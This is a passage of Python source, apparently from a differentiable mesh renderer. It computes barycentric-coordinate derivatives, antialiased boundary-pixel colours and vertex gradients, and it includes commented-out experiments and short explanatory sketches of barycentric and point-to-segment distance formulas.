xv = np.c_[np.zeros([len(p1),1]), p1[:, 2][:,None], (-p1[:,1]/v**2)[:,None]]
dxdp_1 = np.concatenate([xu[:, :, None], xv[:, :, None]], axis=2)
u = p2[:, 0]/p2[:, 2]
v = p2[:, 1]/p2[:, 2]
# xudiv = (cam_f - a * u - b * v) ** 2
# xu = np.c_[c * (cam_f - b * v) / xudiv, a * v * c / xudiv, a * cam_f * c / xudiv]
# xv = np.c_[b * u * c / xudiv, c * (cam_f - a * u) / xudiv, b * cam_f * c / xudiv]
xu = np.c_[p2[:, 2][:,None], np.zeros([len(p2),1]), (-p2[:,0]/u**2)[:,None]]
xv = np.c_[np.zeros([len(p2),1]), p2[:, 2][:,None], (-p2[:,1]/v**2)[:,None]]
dxdp_2 = np.concatenate([xu[:, :, None], xv[:, :, None]], axis=2)
# x = u * c / (cam_f - a * u - b * v)
# y = v*c/(cam_f - a*u - b*v)
# z = c*cam_f/(cam_f - a*u - b*v)
A = 0.5*np.linalg.norm(np.cross(p1 - p0, p2 - p0),axis=1)
nt_mag = A*2
# nt = nt / A
# db1 = 0.5*np.cross(nt_norm, p2-p1)/A[:, None]
# db2 = 0.5*np.cross(nt_norm, p0-p2)/A[:, None]
# db3_2 = 0.5*np.cross(nt_norm, p1-p0)/A[:, None]
# db3 = - db1 - db2
p = viewVerts
pre1 = -1/(nt_mag[:,None]**2) * nt_norm
ident = np.identity(3)
ident = np.tile(ident[None,:],[len(p2),1,1])
dntdp0 = np.cross((p2-p0)[:,None,:], -ident) + np.cross(-ident, (p1-p0)[:,None,:])
dntdp1 = np.cross((p2-p0)[:,None,:],ident)
dntdp2 = np.cross(ident,(p1-p0)[:,None,:])
# TODO: verify this derivative:
dntnorm = (ident - np.einsum('ij,ik->ijk',nt_norm,nt_norm))/nt_mag[:,None,None]
dntnormdp0 = np.einsum('ijk,ikl->ijl',dntnorm, dntdp0)
dntnormdp1 = np.einsum('ijk,ikl->ijl',dntnorm, dntdp1)
dntnormdp2 = np.einsum('ijk,ikl->ijl',dntnorm, dntdp2)
dpart1p0 = np.einsum('ij,ijk->ik', pre1, dntdp0)
dpart1p1 = np.einsum('ij,ijk->ik', pre1, dntdp1)
dpart1p2 = np.einsum('ij,ijk->ik', pre1, dntdp2)
b0 = np.sum(np.cross(nt_norm, p2 - p1) * (p - p1), axis=1)[:,None]
db0part2p0 = np.einsum('ikj,ij->ik',np.cross(dntnormdp0.swapaxes(1,2), (p2 - p1)[:, None, :]), p - p1)
# db0part2p1 = np.einsum('ikj,ij->ik',np.cross((p2 - p1)[:, None, :], dntnormdp0), p - p1) + np.einsum('ikj,ij->ik', np.cross(-ident,nt_norm[:, None, :]), p - p1) + np.einsum('ik,ikj->ik', np.cross(nt_norm[:, :], p2-p1),-ident)
# db0part2p1 = np.einsum('ikj,ij->ik',np.cross((p2 - p1)[:, None, :], dntnormdp0.swapaxes(1,2)), p - p1) + np.einsum('ikj,ij->ik', np.cross(-ident, nt_norm[:, None, :]), p - p1) + np.einsum('ik,ikj->ik', np.cross(p2-p1,nt_norm[:, :]),-ident)
db0part2p1 = np.einsum('ikj,ij->ik',np.cross(dntnormdp1.swapaxes(1,2), (p2 - p1)[:, None, :]), p - p1) + np.einsum('ikj,ij->ik', np.cross(nt_norm[:, None, :],-ident), p - p1) + np.einsum('ik,ikj->ik', np.cross(nt_norm[:, :], p2-p1), -ident)
db0part2p2 = np.einsum('ikj,ij->ik',np.cross(dntnormdp2.swapaxes(1,2), (p2 - p1)[:, None, :]), p - p1) + np.einsum('ikj,ij->ik', np.cross(nt_norm[:, None, :], ident), p - p1)
db0dp0wrtpart1 = dpart1p0*b0
db0dp1wrtpart1 = dpart1p1*b0
db0dp2wrtpart1 = dpart1p2*b0
db0dp0wrtpart2 = 1./(nt_mag[:,None])*db0part2p0
db0dp1wrtpart2 = 1./(nt_mag[:,None])*db0part2p1
db0dp2wrtpart2 = 1./(nt_mag[:,None])*db0part2p2
db0dp0wrt = db0dp0wrtpart1 + db0dp0wrtpart2
db0dp1wrt = db0dp1wrtpart1 + db0dp1wrtpart2
db0dp2wrt = db0dp2wrtpart1 + db0dp2wrtpart2
######
b1 = np.sum(np.cross(nt_norm, p0 - p2) * (p - p2), axis=1)[:, None]
db1part2p0 = np.einsum('ikj,ij->ik',np.cross(dntnormdp0.swapaxes(1, 2),(p0 - p2)[:, None, :]), p - p2) + np.einsum('ikj,ij->ik', np.cross(nt_norm[:, None, :], ident), p - p2)
db1part2p1 = np.einsum('ikj,ij->ik',np.cross(dntnormdp1.swapaxes(1, 2),(p0 - p2)[:, None, :]), p - p2)
db1part2p2 = np.einsum('ikj,ij->ik',np.cross(dntnormdp2.swapaxes(1, 2),(p0 - p2)[:, None, :]), p - p2) + np.einsum('ikj,ij->ik', np.cross(nt_norm[:, None, :], -ident), p - p2) + np.einsum('ik,ikj->ik', np.cross(nt_norm[:, :], p0-p2), -ident)
db1dp0wrtpart1 = dpart1p0*b1
db1dp1wrtpart1 = dpart1p1*b1
db1dp2wrtpart1 = dpart1p2*b1
db1dp0wrtpart2 = 1./(nt_mag[:,None])*db1part2p0
db1dp1wrtpart2 = 1./(nt_mag[:,None])*db1part2p1
db1dp2wrtpart2 = 1./(nt_mag[:,None])*db1part2p2
db1dp0wrt = db1dp0wrtpart1 + db1dp0wrtpart2
db1dp1wrt = db1dp1wrtpart1 + db1dp1wrtpart2
db1dp2wrt = db1dp2wrtpart1 + db1dp2wrtpart2
######
b2 = np.sum(np.cross(nt_norm, p1 - p0) * (p - p0), axis=1)[:, None]
db2part2p0 = np.einsum('ikj,ij->ik',np.cross(dntnormdp0.swapaxes(1, 2),(p1 - p0)[:, None, :]), p - p0) + np.einsum('ikj,ij->ik', np.cross(nt_norm[:, None, :], -ident), p - p0) + np.einsum('ik,ikj->ik', np.cross(nt_norm[:, :], p1 - p0), -ident)
db2part2p1 = np.einsum('ikj,ij->ik',np.cross(dntnormdp1.swapaxes(1, 2),(p1 - p0)[:, None, :]), p - p0) + np.einsum('ikj,ij->ik', np.cross(nt_norm[:, None, :], ident), p - p0)
db2part2p2 = np.einsum('ikj,ij->ik',np.cross(dntnormdp2.swapaxes(1, 2), (p1 - p0)[:, None, :]), p - p0)
db2dp0wrtpart1 = dpart1p0*b2
db2dp1wrtpart1 = dpart1p1*b2
db2dp2wrtpart1 = dpart1p2*b2
db2dp0wrtpart2 = 1./(nt_mag[:,None])*db2part2p0
db2dp1wrtpart2 = 1./(nt_mag[:,None])*db2part2p1
db2dp2wrtpart2 = 1./(nt_mag[:,None])*db2part2p2
db2dp0wrt = db2dp0wrtpart1 + db2dp0wrtpart2
db2dp1wrt = db2dp1wrtpart1 + db2dp1wrtpart2
db2dp2wrt = db2dp2wrtpart1 + db2dp2wrtpart2
dp0 = np.concatenate([db0dp0wrt[:, None, :], db1dp0wrt[:, None, :], db2dp0wrt[:, None, :]], axis=1)
dp1 = np.concatenate([db0dp1wrt[:, None, :], db1dp1wrt[:, None, :], db2dp1wrt[:, None, :]], axis=1)
dp2 = np.concatenate([db0dp2wrt[:, None, :], db1dp2wrt[:, None, :], db2dp2wrt[:, None, :]], axis=1)
#
dp = np.concatenate([dp0[:, :, None], dp1[:, :, None], dp2[:, :, None]], 2)
# For degenerate triangles the gradient is undefined; it could be zeroed out:
# dp[nt_mag <= 1e-15] = 0
dp = dp[None, :]
nFaces = len(faces)
# visTriVC = self.vc.r[faces.ravel()].reshape([nFaces, 3, 3]).transpose([2, 0, 1])[:, :, :, None, None]
vc = self.vc.r[faces.ravel()].reshape([nFaces, 3, 3]).transpose([2, 0, 1])[:, :, :, None, None]
np.clip(vc, 0., 1., out=vc)  # clamp vertex colors to [0, 1]
visTriVC = vc
dxdp = np.concatenate([dxdp_0[:,None,:],dxdp_1[:,None,:],dxdp_2[:,None,:]], axis=1)
dxdp = dxdp[None, :, None]
# dbvc = np.sum(dp * visTriVC, 2)
# dbvc = dp * visTriVC * t_area[None, :, None, None, None]
dbvc = dp * visTriVC
didp = np.sum(dbvc[:, :, :, :, :, None] * dxdp, 4).sum(2)
# Output shape: VC x N_input x triangle points x UV
# drb0p0 # db0dp0wrt
# drb0p1 # db0dp1wrt
# drb0p2 # db0dp2wrt
# drb1p0 # db1dp0wrt
# drb1p1 # db1dp1wrt
# drb1p2 # db1dp2wrt
# drb2p0 # db2dp0wrt
# drb2p1 # db2dp1wrt
# drb2p2 # db2dp2wrt
#
return didp
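# barycentricDerivatives differentiates the standard normal-based barycentric formula
# b0 = dot(n_hat, cross(p2 - p1, p - p1)) / |n|, with n = cross(p1 - p0, p2 - p0)
# (the b0/b1/b2 expressions above, where |n| = nt_mag = 2A). A self-contained sketch of
# the undifferentiated formula; the helper name `barycentric` is illustrative:

```python
import numpy as np

def barycentric(p, p0, p1, p2):
    """Barycentric coordinates of point p in the plane of triangle (p0, p1, p2)."""
    n = np.cross(p1 - p0, p2 - p0)          # unnormalized face normal
    nt_mag = np.linalg.norm(n)              # equals twice the triangle area
    n_norm = n / nt_mag
    # Each coordinate is the signed sub-triangle area opposite a vertex, over the total area.
    b0 = np.dot(np.cross(n_norm, p2 - p1), p - p1) / nt_mag
    b1 = np.dot(np.cross(n_norm, p0 - p2), p - p2) / nt_mag
    b2 = np.dot(np.cross(n_norm, p1 - p0), p - p0) / nt_mag
    return np.array([b0, b1, b2])
```

# The coordinates sum to 1 and reproduce the vertices' indicator values at the corners.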
def compute_image(self, visible, visibility, f):
"""Construct a sparse jacobian that relates 2D projected vertex positions
(in the columns) to pixel values (in the rows). This can be done
in two steps."""
width = self.frustum['width']
height = self.frustum['height']
num_channels = 3
n_channels = num_channels
vc_size = self.vc.size
# xdiff = dEdx
# ydiff = dEdy
# projVertices = self.camera.r[f[visibility.ravel()[visible]].ravel()].reshape([nVisF,3, 2])
boundaryImage = self.boundarybool_image.astype(bool) & (visibility != 4294967295)
rangeIm = np.arange(self.boundarybool_image.size)
zerosIm = np.ones(self.boundarybool_image.shape).astype(bool)
edge_visibility = self.boundaryid_image
nsamples = self.nsamples
if np.any(boundaryImage):
boundaryFaces = visibility[(boundaryImage) & (visibility != 4294967295)]
nBndFaces = len(boundaryFaces)
projFacesBndTiled = np.tile(boundaryFaces[None, :], [self.nsamples, 1])
sampleFaces = self.renders_faces.reshape([nsamples, -1])[:, (zerosIm * boundaryImage).ravel().astype(bool)].reshape([nsamples, -1]) - 1
edgeFaces = np.tile(self.fpe[edge_visibility.ravel()[(zerosIm * boundaryImage).ravel().astype(bool)]][None, :, :], [nsamples, 1, 1])
edgeSampled = np.any((edgeFaces[:, :, 0] == sampleFaces) | (edgeFaces[:, :, 1] == sampleFaces), 0)
facesInsideBnd = projFacesBndTiled == sampleFaces
wrongBnd = ~edgeSampled
# wrongBnd = np.all(facesInsideBnd, 0)
whereBnd = np.where(boundaryImage.ravel())[0]
# boundaryImage.ravel()[whereBnd[wrongBnd]] = False
if np.any(boundaryImage):
sampleV = self.renders_sample_pos.reshape([nsamples, -1, 2])[:, (zerosIm * boundaryImage).ravel().astype(bool), :].reshape([nsamples, -1, 2])
# sampleBarycentric = self.renders_sample_barycentric.reshape([nsamples, -1, 3])[:, (zerosIm * boundaryImage).ravel().astype(bool), :].reshape([nsamples, -1, 3])
sampleColors = self.renders.reshape([nsamples, -1, 3])[:, (zerosIm * boundaryImage).ravel().astype(bool), :].reshape([nsamples, -1, 3])
boundaryFaces = visibility[boundaryImage & (visibility != 4294967295)]
nBndFaces = len(boundaryFaces)
projFacesBndTiled = np.tile(boundaryFaces[None, :], [self.nsamples, 1])
facesInsideBnd = projFacesBndTiled == sampleFaces
facesOutsideBnd = ~facesInsideBnd
vertsProjBnd = self.camera.r[self.vpe[edge_visibility.ravel()[(zerosIm * boundaryImage).ravel().astype(bool)]].ravel()].reshape([-1, 2, 2])
vertsProjBndSamples = np.tile(vertsProjBnd[None, :], [self.nsamples, 1, 1, 1])
vertsProjBndSamplesOutside = vertsProjBndSamples[facesOutsideBnd]
frontFacing = self.frontFacingEdgeFaces[(zerosIm * boundaryImage).ravel().astype(bool)].astype(bool)
frontFacingEdgeFaces = self.fpe[edge_visibility.ravel()[(zerosIm * boundaryImage).ravel().astype(bool)]][frontFacing]
vertsPerFaceProjBnd = self.camera.r[f[frontFacingEdgeFaces.ravel()].ravel()].reshape([1, -1, 2])
vertsPerFaceProjBnd = np.tile(vertsPerFaceProjBnd, [self.nsamples, 1, 1])
vertsPerFaceProjBnd = vertsPerFaceProjBnd.reshape([-1, 3, 2])[facesOutsideBnd.ravel()]
nv = len(vertsPerFaceProjBnd)
p0_proj = np.c_[vertsPerFaceProjBnd[:,0,:], np.ones([nv,1])]
p1_proj = np.c_[vertsPerFaceProjBnd[:,1,:], np.ones([nv,1])]
p2_proj = np.c_[vertsPerFaceProjBnd[:,2,:], np.ones([nv,1])]
t_area_bnd_edge = np.abs(np.linalg.det(np.concatenate([p0_proj[:,None], p1_proj[:,None], p2_proj[:,None]], axis=1))*0.5)
t_area_bnd_edge[t_area_bnd_edge > 1] = 1
faces = f[sampleFaces[facesOutsideBnd]].ravel()
vertsPerFaceProjBnd = self.camera.r[faces].reshape([-1, 3, 2])
nv = len(vertsPerFaceProjBnd)
p0_proj = np.c_[vertsPerFaceProjBnd[:,0,:], np.ones([nv,1])]
p1_proj = np.c_[vertsPerFaceProjBnd[:,1,:], np.ones([nv,1])]
p2_proj = np.c_[vertsPerFaceProjBnd[:,2,:], np.ones([nv,1])]
t_area_bnd_outside = np.abs(np.linalg.det(np.concatenate([p0_proj[:,None], p1_proj[:,None], p2_proj[:,None]], axis=1))*0.5)
t_area_bnd_outside[t_area_bnd_outside > 1] = 1
faces = f[sampleFaces[facesInsideBnd]].ravel()
vertsPerFaceProjBnd = self.camera.r[faces].reshape([-1, 3, 2])
nv = len(vertsPerFaceProjBnd)
p0_proj = np.c_[vertsPerFaceProjBnd[:,0,:], np.ones([nv,1])]
p1_proj = np.c_[vertsPerFaceProjBnd[:,1,:], np.ones([nv,1])]
p2_proj = np.c_[vertsPerFaceProjBnd[:,2,:], np.ones([nv,1])]
t_area_bnd_inside = np.abs(np.linalg.det(np.concatenate([p0_proj[:,None], p1_proj[:,None], p2_proj[:,None]], axis=1))*0.5)
t_area_bnd_inside[t_area_bnd_inside > 1] = 1
# Trick: the caps above clamp triangle areas to at most 1 while keeping gradients.
p1 = vertsProjBndSamplesOutside[:,0,:]
p2 = vertsProjBndSamplesOutside[:,1,:]
p = sampleV[facesOutsideBnd]
l = (p2 - p1)
linedist = np.sqrt((np.sum(l**2,axis=1)))[:,None]
self.linedist = linedist
lnorm = l/linedist
self.lnorm = lnorm
v1 = p - p1
self.v1 = v1
d = v1[:,0]* lnorm[:,0] + v1[:,1]* lnorm[:,1]
self.d = d
intersectPoint = p1 + d[:,None] * lnorm
self.intersectPoint = intersectPoint
v2 = p - p2
self.v2 = v2
l12 = (p1 - p2)
linedist12 = np.sqrt((np.sum(l12**2,axis=1)))[:,None]
lnorm12 = l12/linedist12
d2 = v2[:,0]* lnorm12[:,0] + v2[:,1]* lnorm12[:,1]
nonIntersect = (d2 < 0) | (d<0)
self.nonIntersect = nonIntersect
argminDistNonIntersect = np.argmin(np.c_[d[nonIntersect], d2[nonIntersect]], 1)
self.argminDistNonIntersect = argminDistNonIntersect
intersectPoint[nonIntersect] = vertsProjBndSamplesOutside[nonIntersect][np.arange(nonIntersect.sum()), argminDistNonIntersect]
lineToPoint = (p - intersectPoint)
n=lineToPoint
dist = np.sqrt((np.sum(lineToPoint ** 2, axis=1)))[:, None]
n_norm = lineToPoint /dist
self.n_norm = n_norm
self.dist = dist
d_final = dist.squeeze()
# max_nx_ny = np.maximum(np.abs(n_norm[:, 0]), np.abs(n_norm[:, 1]))
# d_final = d_final/max_nx_ny
# d_final = d_final
verticesBnd = self.v.r[self.vpe[edge_visibility.ravel()[(zerosIm * boundaryImage).ravel().astype(bool)]].ravel()].reshape([-1, 2, 3])
verticesBndSamples = np.tile(verticesBnd[None, :, :], [self.nsamples, 1, 1, 1])
verticesBndOutside = verticesBndSamples[facesOutsideBnd]
vc = self.vc.r[self.vpe[edge_visibility.ravel()[(zerosIm * boundaryImage).ravel().astype(bool)]].ravel()].reshape([-1, 2, 3])
np.clip(vc, 0., 1., out=vc)  # clamp vertex colors to [0, 1]
vcBnd = vc
vcBndSamples = np.tile(vcBnd[None,:,:],[self.nsamples,1,1,1])
vcBndOutside = vcBndSamples[facesOutsideBnd]
invViewMtx = np.linalg.inv(np.r_[self.camera.view_mtx, np.array([[0, 0, 0, 1]])])
#
camMtx = np.r_[np.c_[self.camera.camera_mtx, np.array([0, 0, 0])], np.array([[0, 0, 0, 1]])]
# invCamMtx = np.r_[np.c_[np.linalg.inv(self.camera.camera_mtx), np.array([0,0,0])], np.array([[0, 0, 0, 1]])]
view_mtx = np.r_[self.camera.view_mtx, np.array([[0, 0, 0, 1]])]
verticesBndOutside = np.concatenate([verticesBndOutside.reshape([-1,3]), np.ones([verticesBndOutside.size//3, 1])], axis=1)
projVerticesBndOutside = (camMtx.dot(view_mtx)).dot(verticesBndOutside.T).T[:,:3].reshape([-1,2,3])
projVerticesBndDir = projVerticesBndOutside[:,1,:] - projVerticesBndOutside[:,0,:]
projVerticesBndDir = projVerticesBndDir/np.sqrt((np.sum(projVerticesBndDir ** 2, 1)))[:, None]
dproj = (intersectPoint[:,0]* projVerticesBndOutside[:,0,2] - projVerticesBndOutside[:,0,0]) / (projVerticesBndDir[:,0] - projVerticesBndDir[:,2]*intersectPoint[:,0])
# Sanity check: dproj computed from the y coordinate should match:
# dproj_y = (intersectPoint[:,1]* projVerticesBndOutside[:,0,2] - projVerticesBndOutside[:,0,1]) / (projVerticesBndDir[:,1] - projVerticesBndDir[:,2]*intersectPoint[:,1])
projPoint = projVerticesBndOutside[:,0,:][:,: ] + dproj[:,None]*projVerticesBndDir[:,:]
projPointVec4 = np.concatenate([projPoint, np.ones([projPoint.shape[0],1])], axis=1)
viewPointIntersect = (invViewMtx.dot(np.linalg.inv(camMtx)).dot(projPointVec4.T.reshape([4,-1])).reshape([4,-1])).T[:,:3]
barycentricVertsDistIntersect = np.linalg.norm(viewPointIntersect - verticesBndOutside[:, 0:3].reshape([-1, 2, 3])[:, 0, :], axis=1)
barycentricVertsDistIntersect2 = np.linalg.norm(viewPointIntersect - verticesBndOutside[:, 0:3].reshape([-1, 2, 3])[:, 1, :], axis=1)
# Sanity check: barycentricVertsDistIntersect + barycentricVertsDistIntersect2 == barycentricVertsDistEdge
barycentricVertsDistEdge = np.linalg.norm(verticesBndOutside[:, 0:3].reshape([-1, 2, 3])[:, 0, :] - verticesBndOutside[:, 0:3].reshape([-1, 2, 3])[:, 1, :], axis=1)
nonIntersect = np.abs(barycentricVertsDistIntersect + barycentricVertsDistIntersect2 - barycentricVertsDistEdge) > 1e-4
argminDistNonIntersect = np.argmin(np.c_[barycentricVertsDistIntersect[nonIntersect], barycentricVertsDistIntersect2[nonIntersect]], 1)
barycentricVertsIntersect = barycentricVertsDistIntersect2 / (barycentricVertsDistIntersect + barycentricVertsDistIntersect2)
barycentricVertsIntersect[nonIntersect] = np.array(argminDistNonIntersect == 0).astype(np.float64)
self.barycentricVertsIntersect = barycentricVertsIntersect
self.viewPointIntersect = viewPointIntersect
self.viewPointIntersect[nonIntersect] = verticesBndOutside.reshape([-1, 2, 4])[nonIntersect, :, 0:3][np.arange(nonIntersect.sum()), argminDistNonIntersect, :]
vcEdges1 = barycentricVertsIntersect[:, None] * vcBndOutside.reshape([-1, 2, 3])[:, 0, :]
vcEdges2 = (1-barycentricVertsIntersect[:,None]) * vcBndOutside.reshape([-1,2,3])[:,1,:]
#Color:
colorVertsEdge = vcEdges1 + vcEdges2
# Barycentric interpolation of the intersection point along the edge (above).
d_finalNP = np.minimum(d_final.copy(),1.)
self.d_final_outside = d_finalNP
self.t_area_bnd_outside = t_area_bnd_outside
self.t_area_bnd_edge = t_area_bnd_edge
self.t_area_bnd_inside = t_area_bnd_inside
areaWeights = np.zeros([nsamples, nBndFaces])
areaWeights[facesOutsideBnd] = (1-d_finalNP)*t_area_bnd_edge + d_finalNP *t_area_bnd_outside
areaWeights[facesInsideBnd] = t_area_bnd_inside
areaWeightsTotal = areaWeights.sum(0)
# areaWeightsTotal[areaWeightsTotal < 1] = 1
self.areaWeightsTotal = areaWeightsTotal
finalColorBndOutside = np.zeros([self.nsamples, boundaryFaces.size, 3])
finalColorBndOutside_edge = np.zeros([self.nsamples, boundaryFaces.size, 3])
finalColorBndInside = np.zeros([self.nsamples, boundaryFaces.size, 3])
sampleColorsOutside = sampleColors[facesOutsideBnd]
self.sampleColorsOutside = sampleColors.copy()
finalColorBndOutside[facesOutsideBnd] = sampleColorsOutside / self.nsamples
self.finalColorBndOutside_for_dr = finalColorBndOutside.copy()
# finalColorBndOutside[facesOutsideBnd] *= d_finalNP[:, None] * t_area_bnd_outside[:, None]
finalColorBndOutside[facesOutsideBnd] *= d_finalNP[:, None]
finalColorBndOutside_edge[facesOutsideBnd] = colorVertsEdge / self.nsamples
self.finalColorBndOutside_edge_for_dr = finalColorBndOutside_edge.copy()
# finalColorBndOutside_edge[facesOutsideBnd] *= (1 - d_finalNP[:, None]) * t_area_bnd_edge[:, None]
finalColorBndOutside_edge[facesOutsideBnd] *= (1 - d_finalNP[:, None])
sampleColorsInside = sampleColors[facesInsideBnd]
self.sampleColorsInside = sampleColorsInside.copy()
# finalColorBndInside[facesInsideBnd] = sampleColorsInside * self.t_area_bnd_inside[:, None]
finalColorBndInside[facesInsideBnd] = sampleColorsInside / self.nsamples
finalColorBnd = finalColorBndOutside + finalColorBndOutside_edge + finalColorBndInside
# finalColorBnd /= areaWeightsTotal[None, :, None]
bndColorsImage = np.zeros_like(self.render_resolved)
bndColorsImage[(zerosIm * boundaryImage), :] = np.sum(finalColorBnd, axis=0)
# bndColorsImage1 = np.zeros_like(self.render_resolved)
# bndColorsImage1[(zerosIm * boundaryImage), :] = np.sum(self.finalColorBndOutside_for_dr, axis=0)
#
# bndColorsImage2 = np.zeros_like(self.render_resolved)
# bndColorsImage2[(zerosIm * boundaryImage), :] = np.sum(self.finalColorBndOutside_edge_for_dr, axis=0)
#
# bndColorsImage3 = np.zeros_like(self.render_resolved)
# bndColorsImage3[(zerosIm * boundaryImage), :] = np.sum(finalColorBndInside, axis=0)
finalColorImageBnd = bndColorsImage
if np.any(boundaryImage):
finalColor = (1 - boundaryImage)[:, :, None] * self.color_image + boundaryImage[:, :, None] * finalColorImageBnd
# finalColor1 = (1 - boundaryImage)[:, :, None] * self.color_image + boundaryImage[:, :, None] * bndColorsImage1
# finalColor2 = (1 - boundaryImage)[:, :, None] * self.color_image + boundaryImage[:, :, None] * bndColorsImage2
# finalColor3 = (1 - boundaryImage)[:, :, None] * self.color_image + boundaryImage[:, :, None] * bndColorsImage3
else:
finalColor = self.color_image
np.clip(finalColor, 0., 1., out=finalColor)  # clamp the final image to [0, 1]
return finalColor
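# compute_image weights each outside sample by its distance to the occluding edge:
# the sample p is projected onto the edge (p1, p2) and, when the projection leaves
# the segment, the nearer endpoint is used instead (the nonIntersect case above).
# A standalone sketch of that distance computation; the helper name and the
# endpoint rule (nearest endpoint by Euclidean distance, equivalent in outcome to
# the argmin over projection coefficients used above) are illustrative:

```python
import numpy as np

def point_to_segment(p, p1, p2):
    """Distance from 2D point p to segment (p1, p2), and the closest point."""
    l = p2 - p1
    lnorm = l / np.linalg.norm(l)
    d = np.dot(p - p1, lnorm)                       # projection coefficient from p1
    d2 = np.dot(p - p2, (p1 - p2) / np.linalg.norm(p1 - p2))  # and from p2
    if d < 0 or d2 < 0:                             # projection falls outside the segment
        closest = p1 if np.linalg.norm(p - p1) <= np.linalg.norm(p - p2) else p2
    else:
        closest = p1 + d * lnorm                    # foot of the perpendicular
    return np.linalg.norm(p - closest), closest
```

# With d and d2 both nonnegative the foot of the perpendicular lies between the endpoints.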
def compute_derivatives_verts(self, observed, visible, visibility, barycentric, image_width, image_height, num_verts, f):
width = self.frustum['width']
height = self.frustum['height']
num_channels = 3
n_channels = num_channels
vc_size = self.vc.size
n_norm = self.n_norm
dist = self.dist
linedist = self.linedist
d = self.d
v1 = self.v1
lnorm = self.lnorm
finalColorBndOutside_for_dr = self.finalColorBndOutside_for_dr
finalColorBndOutside_edge_for_dr = self.finalColorBndOutside_edge_for_dr
d_final_outside = self.d_final_outside
barycentricVertsIntersect = self.barycentricVertsIntersect
# xdiff = dEdx
# ydiff = dEdy
nVisF = len(visibility.ravel()[visible])
# projVertices = self.camera.r[f[visibility.ravel()[visible]].ravel()].reshape([nVisF,3, 2])
boundaryImage = self.boundarybool_image.astype(bool) & (visibility != 4294967295)
rangeIm = np.arange(self.boundarybool_image.size)
zerosIm = np.ones(self.boundarybool_image.shape).astype(bool)
edge_visibility = self.boundaryid_image
vertsProjBnd = self.camera.r[self.vpe[edge_visibility.ravel()[(zerosIm * boundaryImage).ravel().astype(bool)]].ravel()].reshape([-1, 2, 2])
nsamples = self.nsamples
sampleV = self.renders_sample_pos.reshape([nsamples, -1, 2])[:, (zerosIm * boundaryImage).ravel().astype(bool), :].reshape([nsamples, -1, 2])
sampleFaces = self.renders_faces.reshape([nsamples, -1])[:, (zerosIm * boundaryImage).ravel().astype(bool)].reshape([nsamples, -1]) - 1
sampleBarycentric = self.renders_sample_barycentric.reshape([nsamples, -1, 3])[:, (zerosIm * boundaryImage).ravel().astype(bool), :].reshape([nsamples, -1, 3])
sampleColors = self.renders.reshape([nsamples, -1, 3])[:, (zerosIm * boundaryImage).ravel().astype(bool), :].reshape([nsamples, -1, 3])
nonBoundaryFaces = visibility[zerosIm * (~boundaryImage) & (visibility != 4294967295)]
if np.any(boundaryImage):
boundaryFaces = visibility[boundaryImage]
nBndFaces = len(boundaryFaces)
projFacesBndTiled = np.tile(boundaryFaces[None, :], [self.nsamples, 1])
facesInsideBnd = projFacesBndTiled == sampleFaces
facesOutsideBnd = ~facesInsideBnd
# vertsProjBnd[None, :] - sampleV[:,None,:]
vertsProjBndSamples = np.tile(vertsProjBnd[None, :], [self.nsamples, 1,1,1])
vertsProjBndSamplesOutside = vertsProjBndSamples[facesOutsideBnd]
p1 = vertsProjBndSamplesOutside[:, 0, :]
p2 = vertsProjBndSamplesOutside[:, 1, :]
p = sampleV[facesOutsideBnd]
# Computing gradients:
# A multisampled pixel color is given by w * R + (1 - w) * R', hence:
# 1. derivative of outside samples wrt v1: (dw * (bar * vc) - dw * (bar' * vc')) / nsamples, for the sampled face
# 2. derivative of outside samples wrt v, outside barycentrics: (w * (dbar * vc)) / nsamples, for the sampled face
# 3. derivative of outside samples wrt v, edge barycentrics: ((1 - w) * (dbar' * vc')) / nsamples, for the edge face (barv1', barv2', 0)
# 4. derivative of outside samples wrt vc: (w * bar) / nsamples, for the sampled face
# 5. derivative of outside samples wrt vc: ((1 - w) * bar') / nsamples, for the edge face
# 6. derivative of inside samples wrt v: (dbar' * vc') / nsamples, for the sampled face
# 7. derivative of inside samples wrt vc: bar / nsamples, for the sampled face
# For every boundary pixel (i, j) we have a list of sample faces: compute gradients at each sample and sum them by face identity.
# Best option: build a sparse matrix for each term and sum them; the same can be done for the boundary.
# Finally, stack the data and IJ indices of non-boundary with boundary pixels in both dwrt_v and dwrt_vc.
######## 1 derivatives samples outside wrt v 1: (dw * (bar*vc) - dw (bar'*vc') )/ nsamples for face sample
# #Chumpy autodiff code to check derivatives here:
# chEdgeVerts = ch.Ch(vertsProjBndSamplesOutside)
#
# chEdgeVerts1 = chEdgeVerts[:,0,:]
# chEdgeVerts2 = chEdgeVerts[:,1,:]
#
# chSampleVerts = ch.Ch(sampleV[facesOutsideBnd])
# # c1 = (chEdgeVerts1 - chSampleVerts)
# # c2 = (chEdgeVerts2 - chSampleVerts)
# # n = (chEdgeVerts2 - chEdgeVerts1)
#
# #Code to check computation of distance below
# # d2 = ch.abs(c1[:,:,0]*c2[:,:,1] - c1[:,:,1]*c2[:,:,0]) / ch.sqrt((ch.sum(n**2,2)))
# # # np_mat = ch.dot(ch.array([[0,-1],[1,0]]), n)
# # np_mat2 = -ch.concatenate([-n[:,:,1][:,:,None], n[:,:,0][:,:,None]],2)
# # np_vec2 = np_mat2 / ch.sqrt((ch.sum(np_mat2**2,2)))[:,:,None]
# # d2 = d2 / ch.maximum(ch.abs(np_vec2[:,:,0]),ch.abs(np_vec2[:,:,1]))
#
# chl = (chEdgeVerts2 - chEdgeVerts1)
# chlinedist = ch.sqrt((ch.sum(chl**2,axis=1)))[:,None]
# chlnorm = chl/chlinedist
#
# chv1 = chSampleVerts - chEdgeVerts1
# chd = chv1[:,0]* chlnorm[:,0] + chv1[:,1]* chlnorm[:,1]
# chintersectPoint = chEdgeVerts1 + chd[:,None] * chlnorm
# # intersectPointDist1 = intersectPoint - chEdgeVerts1
# # intersectPointDist2 = intersectPoint - chEdgeVerts2
# # Code to check computation of distances below:
# # lengthIntersectToPoint1 = np.linalg.norm(intersectPointDist1.r,axis=1)
# # lengthIntersectToPoint2 = np.linalg.norm(intersectPointDist2.r,axis=1)
#
# chintersectPoint = chEdgeVerts1 + chd[:,None] * chlnorm
#
# chlineToPoint = (chSampleVerts - chintersectPoint)
# chn_norm = chlineToPoint / ch.sqrt((ch.sum(chlineToPoint ** 2, axis=1)))[:, None]
#
# chdist = chlineToPoint[:,0]*chn_norm[:,0] + chlineToPoint[:,1]*chn_norm[:,1]
#
# d_final_ch = chdist / ch.maximum(ch.abs(chn_norm[:, 0]), ch.abs(chn_norm[:, 1]))
#
# d_final_outside = d_final_ch.ravel()
# dwdv = d_final_outside.dr_wrt(chEdgeVerts1)
